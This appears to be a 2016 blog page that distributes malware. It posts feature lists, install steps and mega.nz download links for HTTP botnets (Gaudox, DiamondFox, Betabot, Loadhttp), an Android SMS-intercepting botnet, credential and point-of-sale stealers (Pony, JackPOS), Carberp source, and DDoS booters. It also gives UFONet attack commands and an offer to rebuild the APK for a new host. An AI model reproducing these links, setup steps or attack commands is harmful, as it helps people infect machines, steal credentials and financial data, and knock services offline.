Wednesday, 17 February 2016

Gaudox v1.1.0.0 - HTTP bot | C & ASM, 36kb











- Ring3 Rootkit
Includes Rootkit functionality, which hides all of its components from explorer process.
also worth mentioning that the rootkit prevents from being removed from the system and it's not implemented as a separate file so the bot will not write any file to the harddisk.
this feature is currently working only in 32-bit versions (XP-8.1).

- Persistence/Watchdog
This prevents it from being removed from the system by ensuring that the process is always running on the system.
Maximum compatibility of this feature is when the bot runs with administrator privileges.

- Traffic encrypted
The communication between the bot and the web panel is now encrypted.

- Web panel recoded
The panel has been completely recoded using PDO which makes it safer preventing SQL injection and other attacks.



How to install:
1) Open the builder and create a new profile, you will use these values Key1 and Key2 in the panel.
2) Create a database
2) Open setup.php
3) After installing go to login.php, delete setup.php
5) When creating the bot clients, do not forget to use the same profile you used to install the panel, otherwise the bots will not connect to the panel. 


Download : https://mega.nz/#!2QMjmBYL!OG0uazcKEIIcGTeY3JJdI_L__EAkxKKpsWmhsSosUB8

SmsBot Android Botnet




Features:
-Grabing all information about the victim (Phone Number, ICCID, IMEI, IMSI, Model, OS)
- Interception of incoming SMS messages and sending them to the web-panel and the control room.
- Call forwarding to any number
- Grabing all incoming and outgoing SMS
- Grabing all incoming and outgoing calls
- Record audio, sending it to the server (know what is happening around)
- Sending SMS to any room without the owner's knowledge

The apk work but the panel seems to have some problems. Bots are not showed.
The infected phone connect right to the panel, i know it because there are two folder created named with the imei number of the infected phone (in /sound and /listing) but nothing inside these folders and nothing inside the database...
Maybe that someone here make it working.

Let me know if you need help for decompil the apk changing the host, etc... then recompil it.

Note: At the first line of each php files of the admin panel change '<?' to '<?php' otherwise it will not work. (on many hosting, xampp included)

DOwnload :https://mega.nz/#!GZkzXbDK!Mcla-lIb-FbfNpd5ujiOAS9HHPW6aNNAsIA4eVhl0Yc

Friday, 5 February 2016

JackPOS Stealer

JackPOS Stealer



Download https://mega.nz/#!jN0SHBQZ!JH_FgAWNkMe9nfNcl4GRNZujZc3IUOhi1w80An0iGUI

Most Security Booter

Most Security Booter




Download https://mega.nz/#!GEU3TbLK!9SLo-z-JeJp3VRbPrHEsj5eprdj3GElGmh5DwcNjT04

FloristBooter 3.3

loristBooter 3.3

Feature:

[~]Added a skype Resolver to the Resolve page
[~]Added option to add your own shells to increase your boot
power.
[~]A counter checks how many shells you have added. Does
not check if the shells are working yet
[~]Improved the design of the booter (No random buttons
everywhere)
[~]Fixed the Geolocate system to make it simple
[~]Made the general feel sleeker and less clunky.
[~]Slight changes to the status page
[~]Increased the power quite significantly.
[~]Removed some minor features I felt didn't have a place.

Virus Scan Report:
Código:
https://www.virustotal.com/file/86430beda747b2bc9ce5679f656c51bda962dd3454b1a6a3d797eb7105277da8/analysis/


Download https://mega.nz/#!PJkH1bqQ!pNvLoD2U2KZZW7iTDEct9AeNT77s7A58TvU7kIozISs

Shrek Booter | Shell / API Booter | Many Layers

Shrek Booter | Shell / API Booter | Many Layers


Download https://mega.nz/#!GM1m1brI!JIPKvAwrEkm74tufYHce1KViGAbqw2-u4UNI_0cA_Ts

Orion HTTP Booter

Features:
- Unique HTTP flooding technique
- Hits down most privately hosted webservers
- Nice GUI
- Saves URL's
- Customizable time limit
- Customizable thread limit
- Updated frequently


Download https://mega.nz/#!vBlDzSYL!5DJQZvzRYiFrihPHugfezPZ8YQ7WIZbzozRvaztNd6I

Source Carberp

Source Carberp


Download https://mega.nz/#!qZdBFD7L!MQ976n4OVHVwWKoHRDp4-WiJHJkf5HzKWXyMLTWTWiA

source Vision Bot

Vision Bot 


Download https://mega.nz/#!TUl2QZjI!Ubu06lVWJ0Q06LOeHEGXdiS_d7QOSCvdlF40mRbG0Bs

Spy-1218 [ web rar ]

install >>
1.import db to mysql
2.edited config.php
3.edited | admin/check.php >> $password
4.login to admin

Download https://mega.nz/#!GBlj3RQJ!ZxqKww2q50bYrHe4qgZ_etu8XXW95A-QeDPRh1vInlc


Blackout Botnet V2

1. Uploade alle Dateien aus diesem Ordner in den Pfad deines BlackOut Botpanels.
2. Setze CHMOD 777 für die Datei ip.php (Dateiberechtigung).

1. Upload all files in this folder to the path of your BlackOut botpanel.
2. Set CHMOD 777 for the file ip.php

Visit FREETROJANBOTNET.COM for more informations

0a34e53ca751de62bc16da2c0812440e  Builder.exe
f98a46d0d6b6a386e1920cabeef3f7d9  AxInterop.WMPLib.dll
55ec056cfeaced0e213961149d766d01  Interop.WMPLib.dll
Upload panel to your server
Upload online stats plugin
Create DB using blackout.sql
Set correct settings
Crypt your bot

Download https://mega.nz/#!XVtXHIBC!7GaHzmUbJLHJKUsrHL--7BtxWAoFhPlm32gxwMe6USw

Gorynch / DiamondFox Cracked Builder + Panel

Gorynch / DiamondFox Cracked Builder + Panel
Bot updates released date: June 18th 2015
- Cracked date: June 23rd 2015
- Bot Update log ver: 4.2.0.302
- Protection: VMProtect
- Builder language: VB6 P-Code
- MD5: BD0BB7537EA45B477B0F8E1B400003BF
Credits: ToW / The old Warrior

Functions:
Download and execute (in memory)
Download and execute (on disk)
Open website (Visible)
Open website (Hidden)
UDP Flood
HTTP Flood
Enable / Disable Host Editor
Enable / Disable PoS Grabber
Spam with bots (inbox)
Bitcoin Wallet Stealer
Facebook / Twitter Message spread
Firefox homepage changer
Enable / Disable Keylogger
Take screenshot
Password Grabber (Chorme, Firefox, Opera, IExplore, Safari)
FTP Grabber (Filezilla)
Instant Messaging Password Grabber
Grab EMAIL, SMTP, POP3 and IMAP
Update bot
Uninstall

Builder Options:
Fallback panel.
Custom Connection time.
Encrypted connections.
Encrypted data inside the bot.
Custom User-agent.
Anti-Sysanalizer.
Anti-VirtualBox.
Anti-VMWare.
Anti-Anubis.
Anti-OllyDBG.
Disable Regedit.
Anti-Sandboxie.
Anti-Norman.
Anti-Researchers.
Anti-Malwr.com.
Anti-Wine.
Disable Taskmanager.
USB Spread.
Spread Dropbox.
File Extention Selector
User Acount Control Forcer.
Custom install name
Custom install path
HKCU startup method
Winlogon startup method
Startup folder method
Optional melt function
Startup persistance
Automatic keylogger installation
Automatic Point-Of-Sales grabber installation
Automatic grabbers routine

Extra Info:
Very stable connection.
Random Access Memory plugins execution
Works with any crypter.
Lite Ring3 RootKit (Hide registry keys).
No need dependencies.
Detect IP, country, antivirus, firewall, cpu, gpu, ram, memory, disk, user, PC name, hwid, software architecture and status.
Ability to send individual commands for each bot.
Ability to select the bots by country, status, by type or all.
Statistics. (Map, reports, status, operating system, host status, keylogger status, PoS status, System Architecture, antivirus and firewall)
Real-time Connection Notifications.
Communication between the bot and the panel are encrypted.
Spam is made for bots, not by the webpanel.
Based on plugins so more features will be added in the future.
Working on all OS. (XP, vista, 7, 8, 8.1) (We are starting support for Windows X)


Download https://mega.nz/#!yYkX1TJQ!Dd3FxBmjXdB6TVpnDw4s0kr2n3Bgxuzusw0dVx7Rrjo

ufonet v0.5 b

UFONet – is a tool designed to launch DDoS attacks against a target, using ‘Open Redirect’ vectors on third party web applications, like botnet.

Features :
– Auto-update
– Clean code (only needs python-pycurl)
– Documentation with examples
– Web/GUI Interface
– Proxy to connect to ‘zombies’ (ex: tor)
– Change HTTP Headers (User-Agent, Referer, Host…)
– Configure requests (Timeout, Retries, Delay…)
– Search for ‘zombies’ on google results (using a pattern or a list of dorks)
– Test ‘Open Redirect’ vulnerabilities on ‘zombies’
– Download/Upload ‘zombies’ from Community
– Inspect a target (HTML objects sizes)
– Set a place to ‘bit’ on a target (ex: big file)
– Control number of rounds to attack
– Apply cache evasion techniques


Installing:
UFONet runs on many platforms. It requires Python and the following library:
— python-pycurl – Python bindings to libcurl
On Debian-based systems (ex: Ubuntu), run:
— sudo apt-get install python-pycurl
Source libs: Python | PyCurl

Attacking a target:
Enter a target to attack, with the number of rounds that will be attacked:
./ufonet -a http://target.com -r 10This will attack the target, with the list of ‘zombies’ that your provided on: “zombies.txt”, a number of 10 times for each ‘zombie’. That means, that if you have a list of 1.000 ‘zombies’,
the program will launch 1.000 ‘zombies’ x 10 rounds = 10.000 ‘hits’ to the target.
::By default, if you don’t put any round, it will apply only 1. ::
Additionally, you can choose a place to recharge on target’s site. For example, a large image, a big size file or a flash movie. In some scenarios where targets doesn’t use cache systems,
this will do the attack more effective.
Testing botnet:
Open ‘zombies.txt’ (or another file) and create a list of possible ‘zombies’. Urls of the ‘zombies’ should be like this: http://target.com/check?uri=
After that, launch it:
./ufonet -t zombies.txt
At the end of the process, you will be asked if you want to update the list adding automatically only ‘vulnerable’ web apps.
Wanna update your list (Y/n)
If you reply ‘Y’, your file: zombies.txt will be updated.


Download https://mega.nz/#!6MMjHQLY!-R7K7uZGx1nRMnw2e_DIBLQuZrWNb0wVGQkeCilST1k

Loadhttp Botnet

Loadhttp Botnet
Bot Feature List:

HTTP bot (communication encrypted using a modified standard encryption algorithm and use of static and dynamic passed around keys)
Coded in C++ (no dependencies other than Windows, no use of CRT, supports unicode/all language characters)
DNS resolving bypasses HOSTS file
Safemode startup ability
Startup with elevation retention (starts up with previously obtained elevated rights)
User-mode rootkit
Persistence and protection of registry key, file, and process
Hides file and startup also not visible in msconfig
Anti-Virus killer (supports 31 security solutions covering 95%+ of the AV market)
Anti-Malware/Botkiller (disables or kills the majority of all malware, even those notorious for being extremely resistant to
tampering. scans heuristically)
Privilege escalation through social engineering
Visit website visible or hidden
Execute shell command visible or hidden
Download & Update (options to confirm with MD5 hash, execute file with commandline arguments, save to specific location)
Uninstallation (gets rid of startup, installed file/directory, executed file, registry keys that hold bot data, and optionally scans
the entire system for any file that matches the MD5 of the currently executed file for deletion)
Disable system restore and delete any old restoration points
Disable Windows Firewall
Disable Windows Update
Detection of shutdown and logoff
Preventing of going into stand-by mode
Support for unlimited domains in configuration
Change homepages on Internet Explorer, Mozilla Firefox, and Google Chrome
Whenever files are deleted by the bot, the memory is freed (safe-delete, a.k.a. data is unrecoverable)
Command&Control Panel is secure from any web-hacking and query injections. supports multi-user management
Proactive AV settings bypasses
CloudFlare support in the Control Panel
~44kb file size
Handling of own Zone.Identifier stream without dampening of optimal internet settings as some other bots do
Additional process persistence via injected watchdog threads
Ability to send a list of download links and have the links be randomly chosen for download or update


Control Panel Feature List:

Captcha on login page prevents any bruteforce attack attempts
Control Panel endured a security audit done by a team of experienced web-vulnerability professionals, you are guaranteed to be hack-safe
Highly detailed information and statistics displayed and stored about your bot network
Detailed displayed commands
Highly modifyable commands: you can pause, restart, and delete commands. You can modify command filters extensively.
Password changing ability
Ability to optionally use a loginpage-URL-key to prevent and discourage panel sniffing attempts
Modifyable bot communication settings
User management page has broad functionality for adding and removing other users, controlling user privileges and seeing how active they have been
There is a page for conveniently viewing the foreground window activity of bots
The control panel is compatible with all recent versions of PHP and MySQL

Panel Setup:
------------
1) Upload all of the files to a webserver at the correct path.
2) Create a Mysql database and note the host, username, password, and db name.
3) In phpmyadmin, navigate to "Import" and select DATABASE.sql from this directory, then upload it.
4) Open up the file CONFIGURATION.php. Input your database credentials and encryption key.
    (You should have been provided with the encryption key)
5) Navigate to the /login/ page and log in with the credentials Admin:change_me
6) Once in the panel, go to the Preferences page and change your password.
7) Use the login page key feature available in Preferences for your security as well.
    (You visit your login page like: http://panel.net/path/login/?key=1234)
8) You should be able to administer bots and control them through commands now.
9) Now that panel setup is complete, delete or move this file and DATABASE.sql from the webserver.
    (This is important)


Download https://mega.nz/#!SV91EYRa!FAEdWqKRHrlfIbQWzAJA-nCSNPGh6lVGCKNYP416IMQ

Pony 2.0 Builder + src

Pony 2.0 Builder + src
+++++++LATEST PONY STEALER/LOADER+++++++

+HTTP GRABBER (GOOGLE CHROME , FIREFOX ETC)
+HTTPS
+FTP (ALL LATEST PAPULOR CLIENTS)
+BITCOINS WALLET GRABBER(OPTIONAL)
+POP3, SMTP , ALL LATEST CLIENTS GRABBER(EMAILS CLIENT SPECIALLY CHINA)
"PONY 2015"



Download https://mega.nz/#!OY0x2bRY!e-rQvHMLoSI13LKEHwiONFrXpZiWd6e8rU1TeUe1GZY

Botnet PlasmaHTTP + Bin completa

Botnet PlasmaHTTP + Bin completa

Plasma HTTP variante mejorada del famoso Athena HTTP que atacaba solamente a windows XP esta variante ataca a todas las versiones de windows tiene la funcion de robar las claves guardadas en el navegador google chrome incluso puede robar las claves almacenadas en Filezilla FTP esta botnet tiene una alta tasa de infeccion tiene la opcion de enviar al atacante toda la informacion del pc victima pudiendo deshabilitar varias aplicaciones del software de windows el atacante puede enviar comandos a la maquina infectada soportando cinco comandos altamente peligroso : 
 
" Comandos DDOS "
- Slowloris
- UDP
- Arme
- HTTP Post
- HTTP Get
- Condis
- BwFlood
- Stop DDos
" Comandos Miner "
- CPU
- GPU
" Comandos Bot "
- Download
- Update
- Uninstall
- Update Gate
" Comandos Botkiller "
- Run Bot Killer Module
- Run Hard Bot Killer Module
- Enable Proactive Bot Killer
- Disable Proactive Bot Killer
" Comandos Misc "
- Hosts
- Shell
- Visit Hidden
- Visit Visible
- Torrent Seeder


Download https://mega.nz/#!rFkDCTrb!W7E693661rd8lmVbF5NUQtJv6AmHiUjX5h4OmUV7xUc

Betabot 1.7.0.1 Panel & Builder Cracked by duyan13

  • Form Grabber
    When specified sites are detected, Betabot will pull any relevant forms as they are sent, and export details to the main panel. In order for the Form Grabber to work, you must specify filters on the panel. When creating filters, the use of wildcards (*) are supported.
    • FireFox (Normal and SSL)
    • Internet Explorer (Normal and SSL)
    • Google Chrome (Normal and SSL)
  • x86/64 Userkit
    Userland rootkit for both 32 bit and 64 bit systems allows the bot to remain untouchable to other bots and basic user interference. Innovative technique for intercepting system calls on x86 systems allows for better compatibility with other bots. All hooks made will be restored if removed and general unhooker removes 3rd party hooks on sensitive NT service stubs.
  • AntiVirus Disabler
    Using multiple methods removal methods, Betabot is able to remove or disable over 30 different Anti Viruses from user mode. On Vista and 7, elevation is required for this function to work properly. To help achieve maximum efficiency, a custom social engineering tactic (written in 12 languages) is used to trick the user into elevating the bot process. This method has proven to be roughly 70% - 80% effective when attempting to elevate privileges.
     
     
    • Ahnlab v3 Lite (XP only)
    • ArcaVir
    • Avast!
    • AVG
    • Avira
    • BitDefender (On minimal config)
    • BKAV
    • BullGuard
    • Emsisoft Anti-Malware
    • ESET NOD32 / Smart Security
    • F-PROT
    • F-Secure IS
    • GData IS
    • Ikarus AV
    • K7 AntiVirus
    • Kaspersky AV/IS (Older versions only)
    • Lavasoft Adaware AV
    • MalwareBytes Anti-Malware
    • McAfee
    • Microsoft Security Essentials
    • Norman AntiVirus
    • Norton AntiVirus (Vista+ only)
    • Outpost Firewall Pro
    • Panda AV/IS
    • Panda Cloud AV (Free version)
    • PC Tools AntiVirus
    • Rising AV/IS
    • Sophos Endpoint AntiVirus
    • Total Defense
    • Trend Micro
    • Vipre
    • Webroot SecureAnywhere AV
    • Windows Defender
    • ZoneAlarm IS
  • Anti-Malware (Botkiller)
    Complex heuristic-based anti-malware component allows for thorough removal of not only major/common malware used in PPI ventures and more. Suspicious autostart items, files, processes and injected code will be removed/disabled when possible. Special options to target BTC/LTC miners is available.
  • DNS Blocker/Redirector
    The domain name modifier allows domains to be forced to resolve to any IP provided, or flat out blocked. All popular browsers/desktop applications supported.
  • Live FTP/POP3 grabber
    Network data interception allows FTP and POP3 logins over non-SSL connections to be intercepted and recorded in real time. Additionally, SSH logins made from PuTTY client are recorded and reported to the server.
  • File Search
    Ability to search all files on local hard disks for certain terms or files with certain names/extensions. Additionally, directories can be excluded from the search. Files matching search parameters will be uploaded to the C2 server.
  • Proactive Defense Mode
    Special self-defense mode that can be toggled on and off. When turned on, this will block most known methods of code injection and other malware-related activity to ensure only betabot is in control.
  • General bot defense
    Using a myriad of different concepts, betabot protects itself from removal/tampering. Areas of protection include process, autostart and file protection. Betabot is highly resistant to code injection, file removal and unhooking.
  • Additional features:
    • File Size < 150kb
    • Config Editor to edit builds -- Change group names
    • Block Bootkit Installation of some Bootkits (Mainly Rovnix(Carberp)). Can be toggled on/off from the panel.
    • Multi Server Support for up to 16 different servers. Different configurations are possible for each individual server.
    • Four different DDoS methods. Various settings to change. Uses local information to attempt to randomize headers in HTTP Floods.
         UDP
         Rapid Connect/Disconnect
         HTTP GET
         Slowloris
    • Experimental Ruskill - Using an active Sandbox-like, Betabot will attempt to sequester specified programs and roll back any changes made by them after Running. This feature is currently in development and may not work on some bots.
    • USB Autorun - When enabled, Betabot will add itself to any USB drive inserted into the machine using LNK-File swap techniques.
    • SOCKS4 Server - Turn your bots into dedicated SOCKS4 proxies. You may set the port as well as the duration. Supports UPnP.
    • FTP Stealer harvests live FTP logins as they happen in real time.
    • Anti Virus Checker allows you to enter your Scan4You account info into the panel and makes use of the S4Y API for quick and easy scanning, straight from your own panel.
    • Various Rudimentary Antis To help maintain the integrity of Beta Bot and to protect various pieces of vital code, Beta Bot makes use of multiple anti debugging and anti dumping methods.
    • Download / Update / Uninstall / etc - Basic commands expected of all bots. Supports DLLs and JAR files.
    • Additional User Accounts - Ability to create additional user accounts to access your panel. Fully customizable access levels.
    • Advanced Search Options to locate specific bots quickly and easily.
Download https://mega.nz/#!6c0SUbpY!Q9oUTcuFuEcwHsl9JH8xQVexlOMOluZ3y4XynPD5mys